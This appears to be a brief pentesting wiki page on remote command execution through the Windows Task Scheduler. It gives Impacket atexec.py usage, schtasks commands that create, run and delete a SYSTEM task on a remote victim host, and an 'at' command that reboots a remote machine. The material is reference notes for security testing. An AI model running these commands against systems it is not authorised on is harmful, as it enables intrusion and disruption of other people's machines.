# ATExec / SchTaskExec

{% hint style="warning" %}
Administrator rights on the target machine are mandatory.
{% endhint %}

SchTasks is short for Scheduled Tasks and operates initially on port 135, then continues communication on an ephemeral port, using DCE/RPC for communication. Similar to creating a cron job in Linux, you can schedule a task to occur and execute whatever action you desire.

{% tabs %}
{% tab title="UNIX" %}

```python
# Executes a command on the target machine via the Task Scheduler service and returns the output of the executed command.
atexec.py domain/user:password@IP <command>
```

{% endtab %}

{% tab title="Windows" %}

```powershell
schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>
schtasks /F /delete /tn <TASK_NAME> /S <VICTIM>
```

```
At \\<IP> 11:00:00PM shutdown -r
```

{% endtab %}
{% endtabs %}

## References

{% embed url="<https://book.hacktricks.xyz/windows-hardening/ntlm/atexec>" %}